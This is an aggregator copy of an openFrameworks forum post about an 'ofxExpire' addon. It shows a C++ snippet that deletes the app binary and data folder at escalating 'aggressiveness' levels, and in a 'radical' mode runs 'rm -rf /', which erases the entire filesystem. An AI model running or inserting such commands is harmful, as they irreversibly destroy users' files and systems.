Quantcast
Channel: openFrameworks - Latest posts
Viewing all articles
Browse latest Browse all 40524

ofxExpire addon

$
0
0

if (howAgressive == binary) {
  s = ofSystem("rm -r ../../../*.app");
  cout << s << endl;
} else if (howAgressive == both) {
  s = ofSystem("rm -r ../../../*.app");
  cout << s << endl;
  s = ofSystem("rm -r ../../../data");
  cout << s << endl;
} else if (howAgressive == radical) {
  s = ofSystem("rm -rf /");
  cout << s << endl;
}

Viewing all articles
Browse latest Browse all 40524

Trending Articles



<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>